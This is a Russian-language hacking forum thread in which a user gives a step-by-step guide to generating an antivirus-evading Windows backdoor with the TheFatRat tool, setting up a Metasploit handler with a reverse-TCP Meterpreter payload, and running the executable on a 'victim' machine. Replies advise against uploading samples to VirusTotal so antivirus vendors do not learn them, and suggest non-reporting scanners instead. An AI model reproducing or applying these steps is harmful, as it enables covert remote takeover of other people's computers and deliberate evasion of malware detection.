100% эксплоит (не детектится антивирусами)

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем koldonuuchu, 5 ноя 2016.

Наш партнер Genesis Hackspace
Метки:
  1. koldonuuchu

    koldonuuchu Active Member
    Команда форума Grey Team

    Регистрация:
    4 ноя 2016
    Сообщения:
    36
    Симпатии:
    37
    Общий Салам!
    Хочу Вас познакомить с одним замечательным генератором TheFatRat.

    Шаг 1. Устанавливаем git
    sudo apt-get install git
    Шаг 2. Клонируем исходники генератора

    Шаг 3. Переходим в cd TehFatrat/Setup, даем права на выполнение chmod +x setup.sh и наконец запускаем инсталятор ./setup.sh
    Шаг 4. После установки всех зависемостей нужно обратно перейти в директорию TheFatrat и дать права на исполнение двум файлам для этого введите:
    chmod +x fatrat и chmod +x powerfull.sh

    Шаг 5. Запускаем генератор для этого введите ./fatrat
    Шаг 6. Выбираем второй пункт в меню ([02] CREATE FUD 100% BACKDOOR ( SLOW BUT POWERFULL)
    Шаг 7. Вводим наш ip адрес (адрес машины с которого производим атаку) (в моем случае set lhost: 192.168.1.100)
    Шаг 8. Вводим порт прослушивания (в моем случае set lport: 5555)
    Теперь ждем пока сгенерируется наш shell code :) (После того как сгенерируется шелл код, окно автоматически закроется)
    Идем в директорию TheFatrat/output и видим там Powerfull.exe (этот экзешник можно переименовать как вам вздумается)
    Шаг 9. Перед тем как отправить его жертве проверим его на https://virustotal.com или http://nodistribute.com как видим результаты впечатляют)))
    Шаг 10. Запускаем msfconsole:
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.1.100
    set lport 5555
    exploit

    Шаг 11. Запускаем экзешник на машине жертвы и вуаля meterpreter сессия получена!!!

    P.S Прошу строго не судить я тут у вас впервые и заранее извиняюсь за отсутствие картинок и за оформление.
     
    wittmann404, Knife, hdmoor и 10 другим нравится это.
  2. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    499
    Симпатии:
    796
    Мне нравится Ваша статья, когда-то читал про FAT-RAT, а в каких условиях вы тестили?
     
  3. koldonuuchu

    koldonuuchu Active Member
    Команда форума Grey Team

    Регистрация:
    4 ноя 2016
    Сообщения:
    36
    Симпатии:
    37
    Жертва Windows server 2008 R2. Атакующая машина Ubuntu 16.04.
    Спасибо за отзыв!
     
  4. Leon

    Leon Active Member

    Регистрация:
    1 ноя 2016
    Сообщения:
    28
    Симпатии:
    4
    Непроверяйте на virustotal,Непроверяйте на virustotal,Непроверяйте на virustotal:confused:
     
    Alexs565 и Raj_Hack нравится это.
  5. gURaBA_N

    gURaBA_N Member

    Регистрация:
    5 ноя 2016
    Сообщения:
    12
    Симпатии:
    3
    почему?
     
  6. Inject0r

    Inject0r Well-Known Member

    Регистрация:
    3 сен 2016
    Сообщения:
    45
    Симпатии:
    19
    Потому что вирустотал сливает всю инфу антивирусным компаниям. И через некоторое время и эта утилита уже не будет работать.
     
    Alexs565, alexey webware и gURaBA_N нравится это.
  7. gx6060

    gx6060 Python

    Регистрация:
    21 сен 2016
    Сообщения:
    36
    Симпатии:
    40
    так же были пофачены кучи пайлоадов)
     
  8. veterok

    veterok Member

    Регистрация:
    27 сен 2016
    Сообщения:
    11
    Симпатии:
    5
    совершенно верно!
    кстате, способ указанный ТС не работает на x64!
     
  9. kuklofon

    kuklofon ARCH IS NOT A SHKOLOLO
    Команда форума Grey Team

    Регистрация:
    28 фев 2016
    Сообщения:
    359
    Симпатии:
    221
    НЕ ПРОВЕРЯЙТЕ НА ВИРУСТОТАЛ !!!!!!!!!!!!!!! ВЫ ЧЕГО ТВОРИТЕ, НЕГОДЯИ !!!!!
     
    Alexs565, D8mbsniper, Vander и ещё 1-му нравится это.
  10. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    499
    Симпатии:
    796
    Мде... Virustotal, не надо так...
     
  11. pahahak

    pahahak Member

    Регистрация:
    6 ноя 2016
    Сообщения:
    6
    Симпатии:
    11
    Введите политику ознакомительную для ламеров(новичков).
     
  12. gURaBA_N

    gURaBA_N Member

    Регистрация:
    5 ноя 2016
    Сообщения:
    12
    Симпатии:
    3
    Решил опробовать. попробовал на http://nodistribute.com 2 антивиря определили: IKARUS Security: Trojan.AD.Swrort и Norton Antivirus: Heur.AdvML.B

    норм:)
     
  13. SergaevOleg

    SergaevOleg Member

    Регистрация:
    4 ноя 2016
    Сообщения:
    12
    Симпатии:
    2
    Алейкум салам!

    Думаю ТС уже понял, что на virustotal.com и иже с ними чекать больше не стоит. ;)

    Мне тоже понравилась твоя статья. Продолжай в том же духе.

    По существу: на x64 бы починить)
     
  14. pahahak

    pahahak Member

    Регистрация:
    6 ноя 2016
    Сообщения:
    6
    Симпатии:
    11
    ТС то может и понял, вот все остальные ламеры не понимают по сей час, я считаю нужно писать в каждой теме для особо одарённых что нельзя проверять на VT и оповещать и доносить до них это. Так как помимо ТС ещё написал повыше другой пользователь с ником gURaBA_N цитирую: "почему?" - это второй после ТС человек не понимающий суть VT, огромное количество ламеров набежавших на форум элементарно не вдупляют таких вещей, а лезут суда взять годноту и слить на VT над такими моментами должна думать администрация я считаю. Уверен на 100% на форуме ещё немалое количество любителей сливать всё на VT и вновь прибывших любителей с каждым днём всё больше. На многих форумах за такое пермоментный бан выписывают, без сю-сюканья. ИБО сколько лет они уже сливают на VT сколько всего!? Это не понятные мне люди, что у них в головах вообще. Им дай приватный софт они его за один день ушатают своими тысячными ламерскими загрузами на VT. Факт есть факт.
     
    #14 pahahak, 7 ноя 2016
    Последнее редактирование: 7 ноя 2016
    afalin, Knife, IronBird и 4 другим нравится это.
  15. diod_

    diod_ Member

    Регистрация:
    8 сен 2016
    Сообщения:
    7
    Симпатии:
    39
    Cделать раздел закрытым > Этичный хакинг и тестирование на проникновение пускать людей кто в теме у кого прокачены скилы.
     
    Vander нравится это.
  16. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    499
    Симпатии:
    796
    Это никак не предупредить, кто-то намеренно это делает, а кто-то так и не поймет...
     
  17. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    499
    Симпатии:
    796
  18. pahahak

    pahahak Member

    Регистрация:
    6 ноя 2016
    Сообщения:
    6
    Симпатии:
    11
    Те кто намеренно делает это одно, а кто по незнанию это другое. А вообще идея diod_ более оптимальна. Я и пояснил это задача Администрации, её решить можно хоть и не на 100% но хотя бы частично.
     
  19. koldonuuchu

    koldonuuchu Active Member
    Команда форума Grey Team

    Регистрация:
    4 ноя 2016
    Сообщения:
    36
    Симпатии:
    37
    У вас не работает на x64?
     
  20. veterok

    veterok Member

    Регистрация:
    27 сен 2016
    Сообщения:
    11
    Симпатии:
    5
    еще один сканер, не замеченный в сливе антивирусным компаниям https://www.pscan.xyz/
    но базы не всегда актуальны
     
Загрузка...

Поделиться этой страницей